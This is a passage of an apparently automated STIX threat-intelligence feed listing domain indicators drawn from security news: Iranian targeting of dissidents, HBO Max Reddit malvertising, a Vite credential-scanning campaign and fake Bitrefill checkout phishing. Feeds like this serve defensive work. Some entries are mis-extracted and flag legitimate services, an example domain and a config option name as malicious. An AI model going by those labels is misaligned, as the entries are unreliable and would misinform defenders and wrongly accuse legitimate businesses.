UK","url":"https://www.ncsc.gov.uk/news/iranian-cyber-targeting-of-dissidents-activists-and-journalists"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--308a77b0-23c4-42fb-ad16-a8024771360f","created":"2026-09-15T12:00:00.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: backblazeb2.com","description":"Seen in \"Iranian cyber targeting of dissidents, activists and journalists\" (NCSC UK). Context: ctedly should be investigated further: api[.]telegram[.]org backblazeb2[.]com vultrobjects[.]com storjshare[.]io iproyal[.]com lightnin","pattern":"[domain-name:value = 'backblazeb2.com']","pattern_type":"stix","valid_from":"2026-09-15T12:00:00.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"NCSC UK","url":"https://www.ncsc.gov.uk/news/iranian-cyber-targeting-of-dissidents-activists-and-journalists"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2d8b7980-cdd8-4a28-981b-28532712b405","created":"2026-09-15T12:00:00.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: iproyal.com","description":"Seen in \"Iranian cyber targeting of dissidents, activists and journalists\" (NCSC UK). Context: [.]org backblazeb2[.]com vultrobjects[.]com storjshare[.]io iproyal[.]com lightningproxies[.]net Mitigations The best defence is fo","pattern":"[domain-name:value = 'iproyal.com']","pattern_type":"stix","valid_from":"2026-09-15T12:00:00.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"NCSC UK","url":"https://www.ncsc.gov.uk/news/iranian-cyber-targeting-of-dissidents-activists-and-journalists"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--342a1038-d4ed-44c5-9539-25211dca08b1","created":"2026-09-15T12:00:00.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: lightningproxies.net","description":"Seen in \"Iranian cyber targeting of dissidents, activists and journalists\" (NCSC UK). Context: zeb2[.]com vultrobjects[.]com storjshare[.]io iproyal[.]com lightningproxies[.]net Mitigations The best defence is for the user/victim to be","pattern":"[domain-name:value = 'lightningproxies.net']","pattern_type":"stix","valid_from":"2026-09-15T12:00:00.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"NCSC UK","url":"https://www.ncsc.gov.uk/news/iranian-cyber-targeting-of-dissidents-activists-and-journalists"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--dd62122f-f8d3-40e4-8bf4-7047121f86fb","created":"2026-09-15T12:00:00.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: storjshare.io","description":"Seen in \"Iranian cyber targeting of dissidents, activists and journalists\" (NCSC UK). Context: : api[.]telegram[.]org backblazeb2[.]com vultrobjects[.]com storjshare[.]io iproyal[.]com lightningproxies[.]net Mitigations The best","pattern":"[domain-name:value = 'storjshare.io']","pattern_type":"stix","valid_from":"2026-09-15T12:00:00.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"NCSC UK","url":"https://www.ncsc.gov.uk/news/iranian-cyber-targeting-of-dissidents-activists-and-journalists"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0e8ac5d6-6892-4bf2-a6d1-1ea7a7b54c4a","created":"2026-09-15T12:00:00.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: vultrobjects.com","description":"Seen in \"Iranian cyber targeting of dissidents, activists and journalists\" (NCSC UK). Context: nvestigated further: api[.]telegram[.]org backblazeb2[.]com vultrobjects[.]com storjshare[.]io iproyal[.]com lightningproxies[.]net Miti","pattern":"[domain-name:value = 'vultrobjects.com']","pattern_type":"stix","valid_from":"2026-09-15T12:00:00.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"NCSC UK","url":"https://www.ncsc.gov.uk/news/iranian-cyber-targeting-of-dissidents-activists-and-journalists"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8d7cece0-5ddd-4fd9-8dd9-f429e624d22e","created":"2026-09-15T11:51:03.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: ember-bridge.com","description":"Seen in \"HBO Max’s verified Reddit account hijacked to spread malware\" (Malwarebytes Labs). Context: lution with a web protection component. Malwarebytes blocks ember-bridge.com, which is part of the PasteSwitch infrastructure. Educate y","pattern":"[domain-name:value = 'ember-bridge.com']","pattern_type":"stix","valid_from":"2026-09-15T11:51:03.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/news/2026/09/hbo-maxs-verified-reddit-account-hijacked-to-spread-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--10f8ab3e-47a1-43d5-a8f3-2fea0e57abe0","created":"2026-09-15T11:12:32.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: server.host","description":"Seen in \"Mass-Scanning Campaign Exploits Vite Flaw to Extract Cloud Credentials From Exposed Dev Servers\" (The Hacker News). Context: exposes the Vite dev server to the network using --host or server.host config option The sensitive file exists in the allowed dire","pattern":"[domain-name:value = 'server.host']","pattern_type":"stix","valid_from":"2026-09-15T11:12:32.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/mass-scanning-campaign-exploits-vite.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1fbc27c9-cff3-4c95-a864-313f4f84493c","created":"2026-09-15T10:10:15.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: clean-disk-guide.com","description":"Seen in \"Attackers hijack HBO Max’s Reddit account for 48-hour malvertising blitz\" (Help Net Security). Context: oke down into 15 ads for a fake macOS disk utility at apple.clean-disk-guide[.]com and 11 for other developer tools at code-desktop[.]com. O","pattern":"[domain-name:value = 'clean-disk-guide.com']","pattern_type":"stix","valid_from":"2026-09-15T10:10:15.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Help Net Security","url":"https://www.helpnetsecurity.com/2026/09/15/hbo-max-reddit-account-clickfix-infostealer-malware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--19acc946-690b-40ac-b17b-b4de96502ffa","created":"2026-09-15T10:10:15.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: code-desktop.com","description":"Seen in \"Attackers hijack HBO Max’s Reddit account for 48-hour malvertising blitz\" (Help Net Security). Context: .clean-disk-guide[.]com and 11 for other developer tools at code-desktop[.]com. One entry point into a larger system The HBO Max ads wer","pattern":"[domain-name:value = 'code-desktop.com']","pattern_type":"stix","valid_from":"2026-09-15T10:10:15.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Help Net Security","url":"https://www.helpnetsecurity.com/2026/09/15/hbo-max-reddit-account-clickfix-infostealer-malware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a2de894c-06d1-4ef8-8184-9c24794165ad","created":"2026-09-15T10:10:15.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: codex-craft.com","description":"Seen in \"Attackers hijack HBO Max’s Reddit account for 48-hour malvertising blitz\" (Help Net Security). Context: -macos[.]com. Another 36 posed as OpenAI Codex, pointing to codex-craft[.]com. The rest broke down into 15 ads for a fake macOS disk ut","pattern":"[domain-name:value = 'codex-craft.com']","pattern_type":"stix","valid_from":"2026-09-15T10:10:15.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Help Net Security","url":"https://www.helpnetsecurity.com/2026/09/15/hbo-max-reddit-account-clickfix-infostealer-malware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--56183d43-29bc-4a3a-9791-e65e8440db60","created":"2026-09-15T10:10:15.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: hbomax-macos.com","description":"Seen in \"Attackers hijack HBO Max’s Reddit account for 48-hour malvertising blitz\" (Help Net Security). Context: s, 46 used an HBO Max lure, split between hbomaxx[.]app and hbomax-macos[.]com. Another 36 posed as OpenAI Codex, pointing to codex-craf","pattern":"[domain-name:value = 'hbomax-macos.com']","pattern_type":"stix","valid_from":"2026-09-15T10:10:15.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Help Net Security","url":"https://www.helpnetsecurity.com/2026/09/15/hbo-max-reddit-account-clickfix-infostealer-malware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f8a3c332-9b9a-4ad6-9a36-3491b67a741e","created":"2026-09-15T10:10:15.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: hbomaxx.app","description":"Seen in \"Attackers hijack HBO Max’s Reddit account for 48-hour malvertising blitz\" (Help Net Security). Context: id . Of the 108 ads, 46 used an HBO Max lure, split between hbomaxx[.]app and hbomax-macos[.]com. Another 36 posed as OpenAI Codex,","pattern":"[domain-name:value = 'hbomaxx.app']","pattern_type":"stix","valid_from":"2026-09-15T10:10:15.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Help Net Security","url":"https://www.helpnetsecurity.com/2026/09/15/hbo-max-reddit-account-clickfix-infostealer-malware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--80484f89-9001-495d-b220-cd54eecbb29d","created":"2026-09-15T10:10:15.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: hbomaxx.us","description":"Seen in \"Attackers hijack HBO Max’s Reddit account for 48-hour malvertising blitz\" (Help Net Security). Context: HBO Max subreddits,” wrote the user. Clicking the ad led to hbomaxx[.]us, “which looks somewhat legitimate, and has a join button","pattern":"[domain-name:value = 'hbomaxx.us']","pattern_type":"stix","valid_from":"2026-09-15T10:10:15.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Help Net Security","url":"https://www.helpnetsecurity.com/2026/09/15/hbo-max-reddit-account-clickfix-infostealer-malware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a6f91e30-43ff-429a-b5a2-f8d6c465417a","created":"2026-09-15T09:09:00.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: hbomaxx.us","description":"Seen in \"Hacked HBO Max Reddit Account Used for Malware Delivery via ClickFix Attack\" (SecurityWeek). Context: ich does not exist. Clicking the malicious ads led users to hbomaxx[.]us, a page mimicking the official HBO Max site that also con","pattern":"[domain-name:value = 'hbomaxx.us']","pattern_type":"stix","valid_from":"2026-09-15T09:09:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"SecurityWeek","url":"https://www.securityweek.com/hacked-hbo-reddit-account-used-for-malware-delivery-via-clickfix-attack/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a027a87e-10c2-4043-bd0e-b7de3f8c22a2","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: biterflll.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: y tips in seconds. Indicators of compromise (IOCs) Domains: biterflll[.]com bitigift[.]com bitrefall[.]com bitrefill-payments[.]com b","pattern":"[domain-name:value = 'biterflll.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--85704f88-de47-4037-88c1-5a0353b7b778","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: bitigift.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: s. Indicators of compromise (IOCs) Domains: biterflll[.]com bitigift[.]com bitrefall[.]com bitrefill-payments[.]com bitrefill-pays[.","pattern":"[domain-name:value = 'bitigift.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c4c29eb6-e18b-4037-881d-a5075e65d871","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: bitrefall.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: f compromise (IOCs) Domains: biterflll[.]com bitigift[.]com bitrefall[.]com bitrefill-payments[.]com bitrefill-pays[.]com bitregift[.","pattern":"[domain-name:value = 'bitrefall.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f4b3b208-9298-4aa1-8371-fe425f6ebe8e","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: bitrefill.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: ed or charged back. Confirm that the main domain is exactly bitrefill.com before approving a payment. Be wary of domains containing a","pattern":"[domain-name:value = 'bitrefill.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b44ea69b-a37a-4546-a49a-7a4a54bc670b","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: bitrefill-payments.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: Cs) Domains: biterflll[.]com bitigift[.]com bitrefall[.]com bitrefill-payments[.]com bitrefill-pays[.]com bitregift[.]com bitregill[.]com bitr","pattern":"[domain-name:value = 'bitrefill-payments.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1fac7b34-7555-4a23-b3e5-9bb7ca41ee30","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: bitrefill-pays.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: com bitigift[.]com bitrefall[.]com bitrefill-payments[.]com bitrefill-pays[.]com bitregift[.]com bitregill[.]com bitretill[.]com bitrgift[","pattern":"[domain-name:value = 'bitrefill-pays.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--624cf0f2-5e0c-4dda-9b58-e7f27f079be9","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: bitregift.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: trefall[.]com bitrefill-payments[.]com bitrefill-pays[.]com bitregift[.]com bitregill[.]com bitretill[.]com bitrgift[.]com bitrgifts[","pattern":"[domain-name:value = 'bitregift.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0d2468a9-2646-4518-84a0-850f815ea5fd","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: bitregill.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: trefill-payments[.]com bitrefill-pays[.]com bitregift[.]com bitregill[.]com bitretill[.]com bitrgift[.]com bitrgifts[.]com bitrnfill[","pattern":"[domain-name:value = 'bitregill.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3e25513e-d270-4682-b247-43e2accf0d99","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: bitretill.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: [.]com bitrefill-pays[.]com bitregift[.]com bitregill[.]com bitretill[.]com bitrgift[.]com bitrgifts[.]com bitrnfill[.]com bitruflli[","pattern":"[domain-name:value = 'bitretill.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2ddb00c6-211f-4950-af2d-c0422cb566ac","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: bitrgift.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: -pays[.]com bitregift[.]com bitregill[.]com bitretill[.]com bitrgift[.]com bitrgifts[.]com bitrnfill[.]com bitruflli[.]com butrefill","pattern":"[domain-name:value = 'bitrgift.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--cc5383c5-867b-4365-b7fb-b9e9eb49f26a","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: bitrgifts.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: regift[.]com bitregill[.]com bitretill[.]com bitrgift[.]com bitrgifts[.]com bitrnfill[.]com bitruflli[.]com butrefill[.]com pay-bitre","pattern":"[domain-name:value = 'bitrgifts.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--bf0c8233-a5ce-4efe-9f5f-1cdbdf12d1b7","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: bitrnfill.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: regill[.]com bitretill[.]com bitrgift[.]com bitrgifts[.]com bitrnfill[.]com bitruflli[.]com butrefill[.]com pay-bitregill[.]com pay-b","pattern":"[domain-name:value = 'bitrnfill.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--11c2c9de-b30d-4661-9f4b-fdd01a93ae54","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: bitruflli.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: retill[.]com bitrgift[.]com bitrgifts[.]com bitrnfill[.]com bitruflli[.]com butrefill[.]com pay-bitregill[.]com pay-bitrgift[.]com pa","pattern":"[domain-name:value = 'bitruflli.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f90f9f7d-bfe4-420a-bb66-30054eb0f83a","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: butrefill.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: rgift[.]com bitrgifts[.]com bitrnfill[.]com bitruflli[.]com butrefill[.]com pay-bitregill[.]com pay-bitrgift[.]com pay-bitrgifts[.]co","pattern":"[domain-name:value = 'butrefill.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8b352b00-94cc-40a9-b39c-9bc716c7446b","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: example-pay.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: y’s main domain, as in pay.example.com . An address such as example-pay.com is a completely separate domain that anyone could register.","pattern":"[domain-name:value = 'example-pay.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9e620794-68c4-4c85-b727-b7b28de41b73","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: pay-bitigift.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: pay-bitrgift[.]com pay-bitrgifts[.]com pay-butrefill[.]com pay-bitigift[.]com xn--bitrefll-71a[.]com xn--bitrefll-h2a[.]com xn--bitrefl","pattern":"[domain-name:value = 'pay-bitigift.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e9e71e83-b795-461c-b05d-1cca4b8935f3","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: pay-bitregill.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: gifts[.]com bitrnfill[.]com bitruflli[.]com butrefill[.]com pay-bitregill[.]com pay-bitrgift[.]com pay-bitrgifts[.]com pay-butrefill[.]co","pattern":"[domain-name:value = 'pay-bitregill.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f9e0555f-834d-4ee6-865f-58d155e2d1e2","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: pay-bitrgift.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: l[.]com bitruflli[.]com butrefill[.]com pay-bitregill[.]com pay-bitrgift[.]com pay-bitrgifts[.]com pay-butrefill[.]com pay-bitigift[.]co","pattern":"[domain-name:value = 'pay-bitrgift.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ed74e4da-677c-4a73-a534-1db9cae95f5e","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: pay-bitrgifts.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: ]com butrefill[.]com pay-bitregill[.]com pay-bitrgift[.]com pay-bitrgifts[.]com pay-butrefill[.]com pay-bitigift[.]com xn--bitrefll-71a[.","pattern":"[domain-name:value = 'pay-bitrgifts.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--63d0db7e-4a23-4967-bf63-c2e8f2107eb5","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: pay-butrefill.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: pay-bitregill[.]com pay-bitrgift[.]com pay-bitrgifts[.]com pay-butrefill[.]com pay-bitigift[.]com xn--bitrefll-71a[.]com xn--bitrefll-h2","pattern":"[domain-name:value = 'pay-butrefill.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9f385129-f64d-4e4a-b661-90f64b2e5f07","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: xn--bitrefll-71a.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: pay-bitrgifts[.]com pay-butrefill[.]com pay-bitigift[.]com xn--bitrefll-71a[.]com xn--bitrefll-h2a[.]com xn--bitrefll-pay-kfb[.]com xn--bit","pattern":"[domain-name:value = 'xn--bitrefll-71a.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes 